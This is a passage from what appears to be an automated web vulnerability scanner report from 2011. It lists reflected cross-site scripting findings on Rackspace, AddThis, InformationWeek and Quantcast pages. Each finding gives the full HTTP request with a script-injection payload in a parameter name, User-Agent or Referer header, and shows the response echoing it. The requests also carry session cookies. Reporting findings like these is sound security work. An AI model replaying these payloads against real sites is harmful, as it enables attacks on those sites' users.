GET /searchresults.php?c64ff"><script>alert(1)</script>96b4d784cb2=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; s_cc=true; IS3_History=1296860233-1-2_4--1+6--1__4-6_; IS3_GSV=DPL-2_TES-1296919127_PCT-1296919127_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.1.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 15:18:28 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 32647
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.220. http://www.rackspacecloud.com/what_is_cloud_computing [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspacecloud.com
Path: /what_is_cloud_computing
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75999"><script>alert(1)</script>47d8e74dabb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /what_is_cloud_computing?75999"><script>alert(1)</script>47d8e74dabb=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response (redirected)
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:37 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 35614
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<ti ...[SNIP]... onclick="track_chat_button('Green Chat Tab');window.open('https://admin.instantservice.com/Customer?ai=7513&di=39941&email=a@a.com&optionaldata2=http://www.rackspacecloud.com/what_is_cloud_computing/?75999"><script>alert(1)</script>47d8e74dabb=1&optionaldata3=loginpg&optionaldata4=US1ffb86d7e6309d5032693db6bb0255e1&optionaldata5=http://www.google.com/search?hl=en&q=4e7adeacdad626b79a66169b','custclient','width=500,height=320');return fa ...[SNIP]...
4.221. http://www.rackspacecloud.com/what_is_cloud_computing/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspacecloud.com
Path: /what_is_cloud_computing/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71657"><script>alert(1)</script>4fc15ec64f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /what_is_cloud_computing/?71657"><script>alert(1)</script>4fc15ec64f7=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:17 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 35531
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
4.222. http://www.rackspacecloud.com/who_uses_cloud_computing/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.rackspacecloud.com
Path: /who_uses_cloud_computing/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51403"><script>alert(1)</script>cc246efdae8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /who_uses_cloud_computing/?51403"><script>alert(1)</script>cc246efdae8=1 HTTP/1.1 Host: www.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 16:09:26 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Content-Length: 34318
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcf42"><script>alert(1)</script>adfbb7714d1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /signup HTTP/1.1 Host: signup.rackspacecloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fcf42"><script>alert(1)</script>adfbb7714d1 Connection: close
Response
HTTP/1.1 200 OK
Server: Apache/2.2.3 (Mosso Engineering)
Content-Type: text/html; charset=utf-8
Date: Sat, 05 Feb 2011 15:25:28 GMT
Keep-Alive: timeout=15, max=147
Connection: close
Set-Cookie: symfony=88a23bcrc8d9v8c9oo6utubr81; path=/
X-Powered-By: PHP/5.2.6
Content-Length: 17055
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="windows"> <head> <meta ...[SNIP]... partment + '/&fname=Cloud%20Customer&email=a@a.com&optionaldata2=/signup&optionaldata3=cleanEntry&optionaldata4=&optionaldata5=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fcf42"><script>alert(1)</script>adfbb7714d1&optionaldata6=88a23bcrc8d9v8c9oo6utubr81','custclient','width=460,height=300,scrollbars=0'); return false;"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 700c6"><script>alert(1)</script>5f2ad04cb20 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=700c6"><script>alert(1)</script>5f2ad04cb20
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:52:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f022f:0; path=/
Content-Length: 94422
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=700c6"><script>alert(1)</script>5f2ad04cb20" /> ...[SNIP]...
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 85a7e<script>alert(1)</script>8db0524e6be was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=85a7e<script>alert(1)</script>8db0524e6be
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:52:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 94408
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <h4>85a7e<script>alert(1)</script>8db0524e6be - Google search</h4> ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c986f"-alert(1)-"f27af4be1f0 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/software/hosted/showArticle.jhtml HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c986f"-alert(1)-"f27af4be1f0
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sat, 05 Feb 2011 15:26:42 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 05 Feb 2011 15:26:42 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=EREHQTX3EON1DQE1GHPCKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 32479
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]...
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b9ef"-alert(1)-"e3d87d3db3a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/software/hosted/showArticle.jhtml?articleID=225700573&subSection=Hosted+Software HTTP/1.1
Host: www.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6b9ef"-alert(1)-"e3d87d3db3a
Connection: close
Response (redirected)
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 15:27:04 GMT
Server: Apache
Cache-Control: no-cache, max-age=0
Expires: Sat, 05 Feb 2011 15:27:04 GMT
Last-Modified: Tue, Jan 27 2099 23:59:59 GMT
Pragma: no-cache
X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ]
Set-Cookie: JSESSIONID=A23Z2BIMZ5AARQE1GHPSKHWATMY32JVN; path=/
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Connection: close
Content-Type: text/html
Vary: Accept-Encoding, User-Agent
Content-Length: 86561
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><t ...[SNIP]... 00 | Software as a Service | Wireless | Enterprise Software | Windows/Microsoft"; s.prop6=""; s.prop7="Charles Babcock"; s.prop8="173.193.214.243 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)6b9ef"-alert(1)-"e3d87d3db3a"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 765dc"><script>alert(1)</script>c0dd253219a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /p-c0xFC9HiPwWw- HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=765dc"><script>alert(1)</script>c0dd253219a
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Date: Sat, 05 Feb 2011 16:11:30 GMT
Expires: Fri, 04 Feb 2011 04:11:31 GMT
Cache-control: private, max-age=0
Set-Cookie: qcVisitor=0|48|1296922291126|0|NOTSET; Expires=Mon, 28-Jan-2041 16:11:31 GMT; Path=/
Set-Cookie: JSESSIONID=227D5B23207911CA074C31589EE08010; Path=/
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ec9b"><script>alert(1)</script>da8f62fc3cd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1
Host: www.rackspace.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=6ec9b"><script>alert(1)</script>da8f62fc3cd
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3bad"><script>alert(1)</script>f82d960bff2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /index.php HTTP/1.1
Host: www.rackspace.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=f3bad"><script>alert(1)</script>f82d960bff2
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8d3a"><a>9b48329261e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /sitemap404.php HTTP/1.1
Host: www.rackspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US38d41377d7def08a22a9a00f4d26f41d; exp_last_visit=981577072; _mkto_trk=id:045-QRG-025&token:_mch-rackspace.com-1296919121081-29332; IS_UASrackuid=US38d41377d7def08a22a9a00f4d26f41d; _vis_opt_s=1%7C; s_cc=true; livechat=instantservice; IS3_History=1296860233-1-30_4--1+6--1__4-6_; _vis_opt_test_cookie=1; __utma=56207668.1932606479.1296919145.1296919145.1296919145.1; __utmc=56207668; exp_last_activity=1296937072; __utmb=56207668.1.10.1296919145; s_pv=appssite%20-%20Apps%20Home; __utmz=56207668.1296919145.1.1.utmcsr=rackspacecloud.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; s_sq=%5B%5BB%5D%5D; s_ppv=72; gpv_page=appssite%20-%20Apps%20Home; chatslidercookie=invitesent; gpv_pageurl=http%3A//www.rackspace.com/apps; US38d41377d7def08a22a9a00f4d26f41d_pagecount=2; IS3_GSV=DPL-2_TES-1296919145_PCT-1296919145_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; chatslider=A; PHPSESSID=38d41377d7def08a22a9a00f4d26f41d; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;
Referer: http://www.google.com/search?hl=en&q=d8d3a"><a>9b48329261e
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2296a"><script>alert(1)</script>914d51e8ff9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_faq/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Referer: http://www.google.com/search?hl=en&q=2296a"><script>alert(1)</script>914d51e8ff9
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 66303
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
<ti ...[SNIP]... inks/7513/' + chatDepartment + '/&fname=Cloud%20Customer&email=a@a.com&optionaldata2=/cloud_hosting_faq/&optionaldata3=cleanEntry&optionaldata4=http://www.google.com/search?hl=en&q=2296a"><script>alert(1)</script>914d51e8ff9&optionaldata5=Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)&optionaldata6=1ffb86d7e6309d5032693db6bb0255e1','custclient','width=460,height=300,scrollbars=0'); return false;"> ...[SNIP]...
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f19ca"><script>alert(1)</script>ebca61dd64f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /cloud_hosting_faq/ HTTP/1.1
Host: www.rackspacecloud.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f19ca"><script>alert(1)</script>ebca61dd64f
Connection: close
Cookie: lpUASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; __utmz=6088624.1296919128.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; _mkto_trk=id:045-QRG-025&token:_mch-rackspacecloud.com-1296919127768-13820; chatslidercookie=invitesent; IS_UASrackuid=US1ffb86d7e6309d5032693db6bb0255e1; _MyGoogleTracker=(direct); s_cc=true; IS3_History=1296860233-7-2_4--7+6--7_42456-1---1296919229_4-6_4-6; IS3_GSV=DPL-2_TES-1296919127_PCT-1296920684_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=1ffb86d7e6309d5032693db6bb0255e1; chatslider=D; __utma=6088624.618527023.1296919128.1296919128.1296919128.1; __utmc=6088624; __utmb=6088624.10.10.1296919128;
Response
HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:09:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 66284
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
